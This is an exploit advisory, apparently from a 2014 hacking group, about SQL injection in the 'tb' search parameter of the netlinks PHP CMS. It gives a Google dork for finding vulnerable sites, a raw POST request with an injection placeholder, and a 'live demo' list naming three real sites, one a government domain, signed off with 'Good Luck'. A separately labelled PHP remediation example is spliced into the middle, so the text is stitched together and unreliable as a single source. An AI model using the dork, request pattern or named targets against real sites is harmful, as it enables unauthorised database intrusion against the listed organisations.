010101010101010101010101010101010101010101010101010101010
0 0
1 Iranian Datacoders Security Team 2010 - 2014 1
0 0
1 WWW.DataCoders.Org 1
010101010101010101010101010101010101010101010101010101010
############################################
# Exploit Title: netlinks php cms SQL Injection Vulnerability #
# Date: 12/04/2014 #
# Author: H-SK33PY #
# Vendor Link: http://www.netlinks.af/ #
# Platform / Tested on: php/linux cpanel #
# Google Dork: intext:"powered by netlinks" site:af #
# Category: webapplications #
# Code : [SQL injection] #
# Our Website: http://www.datacoders.org/ #
#############################################
The bug is in the "tb" parameter of the search section.
Example:
http://Site/search

POST /search HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 17

tb=as[sql injection here]&btn=Search+
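
For maintainers of an affected site, the fix for a search field like "tb" is to bind the value instead of building the SQL text from it. The script below is an added example, not code from the CMS or from the advisory's author; the table `pages`, the functions search_concat() and search_bound(), and the in-memory SQLite database standing in for the site's database are all assumptions.

```php
<?php
// Added example. Hypothetical names: table `pages`, search_concat(), search_bound().
// SQLite in memory stands in for the CMS database so the script runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO pages (title) VALUES
           ('Aspen report'), ('O''Brien profile'), ('100% cotton')"); // constructed rows

// Pattern that produces this class of bug: the POSTed value is pasted into the SQL text,
// so a quote in the input ends the string literal and the rest is parsed as SQL.
function search_concat(PDO $db, string $tb): array
{
    $sql = "SELECT title FROM pages WHERE title LIKE '%" . $tb . "%'";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened form: the statement text is fixed and the value travels as a bound parameter.
// LIKE wildcards in the input are escaped so they match literally.
function search_bound(PDO $db, string $tb): array
{
    $escaped = strtr($tb, ['\\' => '\\\\', '%' => '\\%', '_' => '\\_']);
    $stmt = $db->prepare("SELECT title FROM pages WHERE title LIKE :q ESCAPE '\\'");
    $stmt->execute([':q' => '%' . $escaped . '%']);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed, benign inputs: a plain term, a name containing a quote, a lone wildcard.
foreach (["as", "O'Brien", "%"] as $tb) {
    try {
        $concat = json_encode(search_concat($db, $tb));
    } catch (PDOException $e) {
        $concat = 'SQL error (the input changed the statement)';
    }
    printf("tb=%-8s concat: %s\n            bound:  %s\n",
           $tb, $concat, json_encode(search_bound($db, $tb)));
}
```
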
Live demo:
http://www.hdgroup.af/search
POST: tb=as[sql injection here]&btn=Search+
http://www.nooragrogroup.com/search
POST: tb=as[sql injection here]&btn=Search+
http://www.fdrc.gov.af/search
POST: tb=as[sql injection here]&btn=Search+
Good Luck
###############################################
# #
# We Are: H-SK33PY | Immortal Boy | D4rkC0d3 | Noter | M4st3r4N0nY | Stormy | M0ri #
# And All Iranian DataCoders Members #
# Special TNX to Ahmadbady , Satanic2000 , Old Joker , S3Ri0uS , Pejvak #
# l3l4ck.$c0rpi0n , Hellboy , A.Cr0x , #
# #
# Don't Forget => WwW.DataCoders.Org #
###############################################